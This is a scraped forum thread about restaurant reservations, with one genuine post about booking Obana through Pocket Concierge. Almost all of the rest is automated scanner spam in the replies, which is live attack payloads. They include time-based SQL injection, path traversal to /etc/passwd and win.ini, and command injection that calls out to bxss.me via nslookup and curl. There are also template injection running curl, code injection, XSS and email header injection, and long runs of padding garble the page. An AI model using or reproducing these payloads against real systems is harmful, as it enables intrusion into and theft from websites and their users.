.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\
re: Yee How
WEB-INF/web.xml
re: Yee How
WEB-INF\web.xml
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
${9999312+9999137}
re: Yee How
)
re: Yee How
!(()&&!|*|*|
re: Yee How
'.gethostbyname(lc('hitoh'.'odjmpica840d0.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(118).chr(72).chr(116).chr(66).'
re: Yee How
^(#$!@#$)(()))******
re: Yee How
".gethostbyname(lc("hitfn"."owfffdvjd972e.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(86).chr(119).chr(74)."
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(101).concat(68).concat(101).concat(88)+(require"socket"
Socket.gethostbyname("hituv"+"btqquevz71fea.bxss.me.")[3].to_s)+"
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(111).concat(85).concat(121).concat(69)+(require'socket'
Socket.gethostbyname('hitoo'+'jgdcwmzv563c1.bxss.me.')[3].to_s)+'
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
http://bxss.me/t/fit.txt%3F.jpg
re: Yee How
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: Yee How
';print(md5(31337));$a='
re: Yee How
/etc/shells
re: Yee How
";print(md5(31337));$a="
re: Yee How
'"
re: Yee How
c:/windows/win.ini
re: Yee How
${@print(md5(31337))}
re: Yee How
<!--
re: Yee How
${@print(md5(31337))}\
re: Yee How
bxss.me
re: Yee How
'.print(md5(31337)).'
re: Yee How
1BF99EIN620
re: Yee How
response.write(9498107*9797264)
re: Yee How
'+response.write(9498107*9797264)+'
re: Yee How
"+response.write(9498107*9797264)+"
re: Yee How
../../../../../../../../../../../../../../etc/passwd
re: Yee How
../../../../../../../../../../../../../../windows/win.ini
re: Yee How
file:///etc/passwd
re: Yee How
<esi:include src="http://bxss.me/rpb.png"/>
re: Yee How
${10000222+9999775}
re: Yee How
../
re: Yee How
)
re: Yee How
redirtest.acx
re: Yee How
!(()&&!|*|*|
re: Yee How
^(#$!@#$)(()))******
re: Yee How
ctime
sleep
p0
(I30
tp1
Rp2
.
re: Yee How
echo bpnksi$()\ jtwwds\nz^xyu||a #' &echo bpnksi$()\ jtwwds\nz^xyu||a #|" &echo bpnksi$()\ jtwwds\nz^xyu||a #
re: Yee How
'.gethostbyname(lc('hitnu'.'prxjghek498c6.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(117).chr(68).chr(106).chr(82).'
re: Yee How
&echo qzlnen$()\ othjgr\nz^xyu||a #' &echo qzlnen$()\ othjgr\nz^xyu||a #|" &echo qzlnen$()\ othjgr\nz^xyu||a #
re: Yee How
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs?.jpg
re: Yee How
".gethostbyname(lc("hitze"."sygdvowyff880.bxss.me."))."A".chr(67).chr(hex("58")).chr(104).chr(74).chr(108).chr(82)."
re: Yee How
|echo omzawe$()\ javjri\nz^xyu||a #' |echo omzawe$()\ javjri\nz^xyu||a #|" |echo omzawe$()\ javjri\nz^xyu||a #
re: Yee How
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs�.jpg
re: Yee How
gethostbyname(lc('hitas'.'jmcldktoded94.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(108).chr(76).chr(106).chr(85)
re: Yee How
expr 9000869448 - 962366
re: Yee How
/etc/shells
re: Yee How
(nslookup -q=cname hituujjxmyfzl8ec62.bxss.me||curl hituujjxmyfzl8ec62.bxss.me))
re: Yee How
../../../../../../../../../../../../../../etc/shells
re: Yee How
$(nslookup -q=cname hitihvqqvynayf6afa.bxss.me||curl hitihvqqvynayf6afa.bxss.me)
re: Yee How
c:/windows/win.ini
re: Yee How
&nslookup -q=cname hitzhuaizjzup4c444.bxss.me&'\"`0&nslookup -q=cname hitzhuaizjzup4c444.bxss.me&`'
re: Yee How
bxss.me
re: Yee How
&(nslookup -q=cname hitghzovqjggze28d4.bxss.me||curl hitghzovqjggze28d4.bxss.me)&'\"`0&(nslookup -q=cname hitghzovqjggze28d4.bxss.me||curl hitghzovqjggze28d4.bxss.me)&`'
re: Yee How
Http://bxss.me/t/fit.txt
re: Yee How
|(nslookup -q=cname hitrkvmzqwriqb1398.bxss.me||curl hitrkvmzqwriqb1398.bxss.me)
re: Yee How
http://bxss.me/t/fit.txt?.jpg
re: Yee How
`(nslookup -q=cname hitdmayfvzcqd53277.bxss.me||curl hitdmayfvzcqd53277.bxss.me)`
re: Yee How
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: Yee How
;(nslookup -q=cname hitfjibykjatz32952.bxss.me||curl hitfjibykjatz32952.bxss.me)|(nslookup -q=cname hitfjibykjatz32952.bxss.me||curl hitfjibykjatz32952.bxss.me)&(nslookup -q=cname hitfjibykjatz32952.bxss.me||curl hitfjibykjatz32952.bxss.me)
re: Yee How
';print(md5(31337));$a='
re: Yee How
HttP://bxss.me/t/xss.html?%00
re: Yee How
'"()
re: Yee How
";print(md5(31337));$a="
re: Yee How
bxss.me/t/xss.html?%00
re: Yee How
|(nslookup${IFS}-q${IFS}cname${IFS}hitbembkhezqpdbe01.bxss.me||curl${IFS}hitbembkhezqpdbe01.bxss.me)
re: Yee How
'&&sleep(27*1000)*wrvuey&&'
re: Yee How
${@print(md5(31337))}
re: Yee How
&(nslookup${IFS}-q${IFS}cname${IFS}hitqtlnhtwnwi9960a.bxss.me||curl${IFS}hitqtlnhtwnwi9960a.bxss.me)&'\"`0&(nslookup${IFS}-q${IFS}cname${IFS}hitqtlnhtwnwi9960a.bxss.me||curl${IFS}hitqtlnhtwnwi9960a.bxss.me)&`'
re: Yee How
"&&sleep(27*1000)*btighy&&"
re: Yee How
${@print(md5(31337))}\
re: Yee How
"+"A".concat(70-3).concat(22*4).concat(111).concat(78).concat(116).concat(72)+(require"socket"
Socket.gethostbyname("hitvd"+"cgpweibf39ae7.bxss.me.")[3].to_s)+"
re: Yee How
'||sleep(27*1000)*abidqf||'
re: Yee How
'.print(md5(31337)).'
re: Yee How
'+'A'.concat(70-3).concat(22*4).concat(104).concat(76).concat(121).concat(66)+(require'socket'
Socket.gethostbyname('hitqz'+'ayzaiann24d72.bxss.me.')[3].to_s)+'
re: Yee How
"||sleep(27*1000)*hvciqy||"
re: Yee How
'A'.concat(70-3).concat(22*4).concat(120).concat(73).concat(101).concat(81)+(require'socket'
Socket.gethostbyname('hitbx'+'omspkfqhe53d6.bxss.me.')[3].to_s)
re: Yee How
replies
re: Yee How
replies�
re: Yee How
'"
re: Yee How
replies/.
re: Yee How
<!--
re: Yee How
'"()&%<zzz><ScRiPt >88Vm(9490)</ScRiPt>
re: Yee How
{{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("curl hitvapcubbwgd0612e.bxss.me")}}
re: Yee How
'"()&%<zzz><ScRiPt >88Vm(9103)</ScRiPt>
re: Yee How
9481885
re: Yee How
00tK6Ysi
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
*1
re: Yee How
-1 OR 5*5=25 --
re: Yee How
-1 OR 5*5=26 --
re: Yee How
-1 OR 5*5=25
re: Yee How
-1 OR 5*5=26
re: Yee How
*if(now()=sysdate(),sleep(15),0)
re: Yee How
0'XOR(
*if(now()=sysdate(),sleep(15),0))XOR'Z
re: Yee How
0"XOR(
*if(now()=sysdate(),sleep(15),0))XOR"Z
re: Yee How
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: Yee How
-1; waitfor delay '0:0:15' --
re: Yee How
-1); waitfor delay '0:0:15' --
re: Yee How
-1 waitfor delay '0:0:15' --
re: Yee How
zdNZhTnA'; waitfor delay '0:0:15' --
re: Yee How
-1 OR 737=(SELECT 737 FROM PG_SLEEP(15))--
re: Yee How
-1) OR 290=(SELECT 290 FROM PG_SLEEP(15))--
re: Yee How
-1)) OR 505=(SELECT 505 FROM PG_SLEEP(15))--
re: Yee How
vRk9ZNzW' OR 92=(SELECT 92 FROM PG_SLEEP(15))--
re: Yee How
B0m73zck') OR 882=(SELECT 882 FROM PG_SLEEP(15))--
re: Yee How
PvY0mymR')) OR 844=(SELECT 844 FROM PG_SLEEP(15))--
re: Yee How
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: Yee How
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: Yee How
'||(select 1 from (select pg_sleep(15))x)||'
re: Yee How
''||(select 1 from (select pg_sleep(15))x)||''
re: Yee How
'"
re: Yee How
@@YQ0y5
re: Yee How
(select 198766*667891)
re: Yee How
(select 198766*667891 from DUAL)
Somehow I got a reservation at Obana 6 months in advance. I have never been before.
I made a request through Pocket Concierge. Pocket Concierge told me I needed to first contact the restaurant on Instagram directly. Then after I confirmed the reservation with the restaurant, Pocket Concierge would confirm it.
I sent a message to Obana on Instagram but they never responded.
4 days later, my reservation at Obana was confirmed by Pocket Concierge. It was very strange!
I'm looking forward to my reservation in October.
re: gomaizo
mobNqAIh
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+972-972-1=0+0+0+1
re: gomaizo
-1 OR 3+972-972-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
yMwePJG7'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 881=(SELECT 881 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 923=(SELECT 923 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 889=(SELECT 889 FROM PG_SLEEP(15))--
re: gomaizo
nAHRWtbG' OR 907=(SELECT 907 FROM PG_SLEEP(15))--
re: gomaizo
w6F5d462') OR 416=(SELECT 416 FROM PG_SLEEP(15))--
re: gomaizo
r4OFXluG')) OR 880=(SELECT 880 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@OUvgJ
re: gomaizo
QJUf9BKn
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
1*
re: gomaizo
-1 OR 2+653-653-1=0+0+0+1
re: gomaizo
-1 OR 3+653-653-1=0+0+0+1
re: gomaizo
if(now()=sysdate(),sleep(15),0)
re: gomaizo
0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z
re: gomaizo
0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z
re: gomaizo
(select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/
re: gomaizo
-1; waitfor delay '0:0:15' --
re: gomaizo
-1); waitfor delay '0:0:15' --
re: gomaizo
1 waitfor delay '0:0:15' --
re: gomaizo
90XHBfGO'; waitfor delay '0:0:15' --
re: gomaizo
-5 OR 596=(SELECT 596 FROM PG_SLEEP(15))--
re: gomaizo
-5) OR 16=(SELECT 16 FROM PG_SLEEP(15))--
re: gomaizo
-1)) OR 708=(SELECT 708 FROM PG_SLEEP(15))--
re: gomaizo
b3ddLozt' OR 484=(SELECT 484 FROM PG_SLEEP(15))--
re: gomaizo
iBVXYTtO') OR 436=(SELECT 436 FROM PG_SLEEP(15))--
re: gomaizo
ZTkUJSE1')) OR 13=(SELECT 13 FROM PG_SLEEP(15))--
re: gomaizo
*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)
re: gomaizo
'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'
re: gomaizo
'||(select 1 from (select pg_sleep(15))x)||'
re: gomaizo
''||(select 1 from (select pg_sleep(15))x)||''
re: gomaizo
1'"
re: gomaizo
@@MKMWi
re: gomaizo
1v37Lf8FeO
re: gomaizo
%0abcc:074625.67-22173.67.b52e4.19990.2@bxss.me
re: gomaizo
response.write(9741162*9748299)
re: gomaizo
to@example.com>%0d%0abcc:074625.67-22174.67.b52e4.19990.2@bxss.me
re: gomaizo
'+response.write(9741162*9748299)+'
re: gomaizo
<esi:include src="http://bxss.me/rpb.png"/>
re: gomaizo
"+response.write(9741162*9748299)+"
re: gomaizo
${10000315+9999173}
re: gomaizo
../../../../../../../../../../../../../../etc/passwd
re: gomaizo
../../../../../../../../../../../../../../windows/win.ini
re: gomaizo
file:///etc/passwd
re: gomaizo
'.gethostbyname(lc('hitnx'.'qwovrmqi0708d.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(112).chr(79).chr(106).chr(65).'
re: gomaizo
../../../../../../../../../../../../../../../proc/version
re: gomaizo
)
re: gomaizo
".gethostbyname(lc("hitjy"."ehliufjh314f0.bxss.me."))."A".chr(67).chr(hex("58")).chr(97).chr(73).chr(100).chr(90)."
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
re: gomaizo
!(()&&!|*|*|
re: gomaizo
../../../../../../../../../../etc/passwd%00.jpg
re: gomaizo
^(#$!@#$)(()))******
re: gomaizo
..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg
re: gomaizo
/../..//../..//../..//../..//../..//etc/passwd%00.jpg
re: gomaizo
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
re: gomaizo
echo hscgox$()\ cdyspg\nz^xyu||a #' &echo hscgox$()\ cdyspg\nz^xyu||a #|" &echo hscgox$()\ cdyspg\nz^xyu||a #
re: gomaizo
/etc/passwd
re: gomaizo
&echo mkydwy$()\ vojneu\nz^xyu||a #' &echo mkydwy$()\ vojneu\nz^xyu||a #|" &echo mkydwy$()\ vojneu\nz^xyu||a #
re: gomaizo
%2fetc%2fpasswd
re: gomaizo
HttP://bxss.me/t/xss.html?%00
re: gomaizo
|echo yrpxxi$()\ bmyzei\nz^xyu||a #' |echo yrpxxi$()\ bmyzei\nz^xyu||a #|" |echo yrpxxi$()\ bmyzei\nz^xyu||a #
re: gomaizo
"+"A".concat(70-3).concat(22*4).concat(108).concat(77).concat(109).concat(87)+(require"socket"
Socket.gethostbyname("hitwb"+"ljhoajxbec49a.bxss.me.")[3].to_s)+"
re: gomaizo
/.././.././.././.././.././.././.././../etc/./passwd%00
re: gomaizo
http://dicrpdbjmemujemfyopp.zzz/yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%3F.jpg
re: gomaizo
;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));
re: gomaizo
bxss.me/t/xss.html?%00
re: gomaizo
(nslookup hitipvimzevbj4e8b2.bxss.me||perl -e "gethostbyname('hitipvimzevbj4e8b2.bxss.me')")
re: gomaizo
'+'A'.concat(70-3).concat(22*4).concat(112).concat(82).concat(115).concat(68)+(require'socket'
Socket.gethostbyname('hitdd'+'nkcsyqwi89efd.bxss.me.')[3].to_s)+'
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd
re: gomaizo
1yrphmgdpgulaszriylqiipemefmacafkxycjaxjs%00.jpg
re: gomaizo
';print(md5(31337));$a='
re: gomaizo
)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))
re: gomaizo
$(nslookup hitvfzltnxdow63a55.bxss.me||perl -e "gethostbyname('hitvfzltnxdow63a55.bxss.me')")
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd
re: gomaizo
Http://bxss.me/t/fit.txt
re: gomaizo
";print(md5(31337));$a="
re: gomaizo
&nslookup hituovrlwilfie3932.bxss.me&'\"`0&nslookup hituovrlwilfie3932.bxss.me&`'
re: gomaizo
../././../././../././../././../././../././../././../././../././../././etc/passwd
re: gomaizo
http://bxss.me/t/fit.txt%3F.jpg
re: gomaizo
${@print(md5(31337))}
re: gomaizo
&(nslookup hitsnsopzslqi56624.bxss.me||perl -e "gethostbyname('hitsnsopzslqi56624.bxss.me')")&'\"`0&(nslookup hitsnsopzslqi56624.bxss.me||perl -e "gethostbyname('hitsnsopzslqi56624.bxss.me')")&`'
re: gomaizo
..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afetc/passwd
re: gomaizo
/etc/shells
re: gomaizo
${@print(md5(31337))}\
re: gomaizo
invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.
re: gomaizo
|(nslookup hitttdeweowxy3f0a6.bxss.me||perl -e "gethostbyname('hitttdeweowxy3f0a6.bxss.me')")
re: gomaizo
c:/windows/win.ini
re: gomaizo
'.print(md5(31337)).'
re: gomaizo
'"
re: gomaizo
file:///etc/passwd
re: gomaizo
bxss.me
re: gomaizo
`(nslookup hitvuuqlarkxu8829a.bxss.me||perl -e "gethostbyname('hitvuuqlarkxu8829a.bxss.me')")`
re: gomaizo
/\../\../\../\../\../\../\../etc/passwd
re: gomaizo
<!--
re: gomaizo
;(nslookup hitfggoffsyydfba8b.bxss.me||perl -e "gethostbyname('hitfggoffsyydfba8b.bxss.me')")|(nslookup hitfggoffsyydfba8b.bxss.me||perl -e "gethostbyname('hitfggoffsyydfba8b.bxss.me')")&(nslookup hitfggoffsyydfba8b.bxss.me||perl -e "gethostbyname('hitfggoffsyydfba8b.bxss.me')")
re: gomaizo
/WEB-INF/web.xml
re: gomaizo
C:\WINDOWS\system32\drivers\etc\hosts
re: gomaizo
../../../../../../../../../../windows/win.ini%00.jpg
re: gomaizo
/../../../../../../../../../../boot.ini
re: gomaizo
%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%af%c0%ae%c0%ae%c0%afwindows%c0%afwin.ini
re: gomaizo
..\..\..\..\..\..\..\..\windows\win.ini
re: gomaizo
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
re: gomaizo
/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini
re: gomaizo
../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini
re: gomaizo
../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini
re: gomaizo
unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.